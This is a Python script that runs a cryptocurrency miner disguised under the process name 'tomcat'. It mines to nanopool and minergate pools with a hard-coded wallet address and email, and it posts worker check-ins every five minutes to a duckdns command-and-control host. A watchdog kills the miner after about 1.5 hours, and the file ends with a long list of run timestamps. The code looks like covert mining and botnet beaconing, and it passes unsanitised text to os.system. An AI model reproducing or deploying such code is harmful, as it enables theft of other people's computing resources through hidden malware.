import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:07.229874
#2018-02-17 16:52:06.443670
#2018-02-17 18:40:08.847167
#2018-02-17 20:29:06.887940
#2018-02-17 22:15:08.644158
#2018-02-18 00:00:08.171032
#2018-02-18 01:51:04.107943
#2018-02-18 03:38:06.925577
#2018-02-18 05:24:06.219617
#2018-02-18 07:16:07.296501
#2018-02-18 09:03:06.813494
#2018-02-18 10:50:09.888802
#2018-02-18 12:38:04.965220
#2018-02-18 14:24:01.762923
#2018-02-18 16:14:07.190739
#2018-02-18 18:03:04.740461
#2018-02-18 19:50:05.653581
#2018-02-18 21:36:07.536591
#2018-02-18 23:24:04.545784
#2018-02-19 01:11:05.327472
#2018-02-19 02:57:03.539430
#2018-02-19 04:44:05.392779
#2018-02-19 06:27:06.000651
#2018-02-19 08:17:03.520974
#2018-02-19 10:06:05.505920
#2018-02-19 11:55:10.265723
#2018-02-19 13:42:03.953422
#2018-02-19 15:31:01.519685
#2018-02-19 17:18:07.277513
#2018-02-19 19:07:07.143589
#2018-02-19 20:52:07.436062
#2018-02-19 22:41:01.590344
#2018-02-20 00:25:06.805016
#2018-02-20 02:12:05.363579
#2018-02-20 04:02:03.613368
#2018-02-20 05:46:05.142989
#2018-02-20 07:32:01.395825
#2018-02-20 09:16:04.981374
#2018-02-20 10:59:08.598293
#2018-02-20 12:47:01.815633
#2018-02-20 14:31:01.634856
#2018-02-20 16:15:09.078909
#2018-02-20 18:01:08.875699
#2018-02-20 19:52:07.700987
#2018-02-20 21:39:06.224243
#2018-02-20 23:21:01.806912
#2018-02-21 01:04:06.584815
#2018-02-21 02:50:06.610682
#2018-02-21 04:37:01.294466
#2018-02-21 06:24:05.755216
#2018-02-21 08:09:06.523872
#2018-02-21 09:56:07.859771
#2018-02-21 11:46:02.183702
#2018-02-21 13:37:01.971398
#2018-02-21 15:21:04.823708
#2018-02-21 17:13:06.131299
#2018-02-21 19:00:10.131156
#2018-02-21 20:47:04.518942
#2018-02-21 22:31:08.614708
#2018-02-22 00:20:09.514323
#2018-02-22 02:08:04.994614
#2018-02-22 03:55:09.478761
#2018-02-22 05:42:07.605887
#2018-02-22 07:26:08.218966
#2018-02-22 09:14:07.890662
#2018-02-22 11:02:08.209130
#2018-02-22 12:49:07.855408
#2018-02-22 14:37:08.223408
#2018-02-22 16:23:07.167865
#2018-02-22 18:10:14.228279
#2018-02-22 19:59:04.484516
#2018-02-22 21:49:03.449195
#2018-02-22 23:36:07.920489
#2018-02-23 01:25:03.877759
#2018-02-23 03:11:07.201275
#2018-02-23 04:59:05.319661
#2018-02-23 06:45:04.376345
#2018-02-23 08:40:09.536227
#2018-02-23 10:57:02.090521
#2018-02-23 12:52:04.744779
#2018-02-23 14:37:02.166675
#2018-02-23 16:26:06.172635
#2018-02-23 18:14:01.455073
#2018-02-23 19:59:02.157051
#2018-02-23 21:42:05.371838
#2018-02-23 23:34:04.104718
#2018-02-24 01:22:03.896986
#2018-02-24 03:12:05.803027
#2018-02-24 04:57:04.338688
#2018-02-24 06:46:04.163677
#2018-02-24 08:40:04.099605
#2018-02-24 10:24:07.253289
#2018-02-24 12:19:06.804302
#2018-02-24 14:12:04.908798
#2018-02-24 15:59:06.047164
#2018-02-24 17:53:06.364124
#2018-02-24 19:41:01.437252
#2018-02-24 22:54:05.186185
#2018-02-25 03:04:05.900930
#2018-02-25 06:59:06.691602